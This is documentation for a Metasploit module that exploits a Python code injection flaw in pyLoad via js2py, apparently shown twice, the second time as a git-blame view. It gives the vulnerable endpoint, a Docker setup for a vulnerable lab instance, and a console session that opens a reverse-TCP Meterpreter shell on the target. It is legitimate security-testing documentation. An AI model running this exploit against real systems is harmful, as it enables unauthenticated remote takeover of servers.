documentation/modules/exploit/linux/http/pyload_js2py_exec.md

## Vulnerable Application

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport
functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request
to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services,
the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load" service runs on
port 9666 and can be used remotely without authentication.

## Verification Steps

1. Start a vulnerable instance of pyLoad using docker
2. Start msfconsole
3. Run: `use exploit/linux/http/pyload_js2py_exec`
4. Set the `RHOST`, `PAYLOAD` and payload associated options
5. Run: `run`

### Docker Setup

```
docker run -d \
  --name=pyload-ng \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 8000:8000 \
  -p 9666:9666 \
  --restart unless-stopped \
  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30
```

## Options

## Scenarios

### pyLoad 0.5.0b3.dev30 via Docker

```
msf > use exploit/linux/http/pyload_js2py_exec 
[*] Using configured payload cmd/unix/generic
msf exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf exploit(linux/http/pyload_js2py_exec) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500

meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer     : f03ec089a4fe
OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/config/data
meterpreter > 
```
Add module docs 2023-02-15 16:29:42 -05:00			`## Vulnerable Application`

			`pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport`
			`functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request`
			`to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services,`
			`the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load" service runs on`
			`port 9666 and can be used remotely without authentication.`

			`## Verification Steps`

			`1. Start a vulnerable instance of pyLoad using docker`
			`2. Start msfconsole`
			3. Run: `use exploit/linux/http/pyload_js2py_exec`
			4. Set the `RHOST`, `PAYLOAD` and payload associated options
			5. Run: `run`

			`### Docker Setup`

			```
			`docker run -d \`
			`--name=pyload-ng \`
			`-e PUID=1000 \`
			`-e PGID=1000 \`
			`-e TZ=Etc/UTC \`
			`-p 8000:8000 \`
			`-p 9666:9666 \`
			`--restart unless-stopped \`
			`lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30`
			```

			`## Options`

			`## Scenarios`

			`### pyLoad 0.5.0b3.dev30 via Docker`

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/pyload_js2py_exec`
Add module docs 2023-02-15 16:29:42 -05:00			`[*] Using configured payload cmd/unix/generic`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128`
Add module docs 2023-02-15 16:29:42 -05:00			`RHOSTS => 192.168.159.128`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp`
Add module docs 2023-02-15 16:29:42 -05:00			`PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134`
Add module docs 2023-02-15 16:29:42 -05:00			`LHOST => 192.168.250.134`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/pyload_js2py_exec) > exploit`
Add module docs 2023-02-15 16:29:42 -05:00
			`[*] Started reverse TCP handler on 192.168.250.134:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Successfully tested command injection.`
			`[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp`
			`[*] Sending stage (24380 bytes) to 172.17.0.2`
			`[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500`

			`meterpreter > getuid`
			`Server username: abc`
			`meterpreter > sysinfo`
			`Computer : f03ec089a4fe`
			`OS : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023`
			`Architecture : x64`
			`Meterpreter : python/linux`
			`meterpreter > pwd`
			`/config/data`
			`meterpreter >`
			```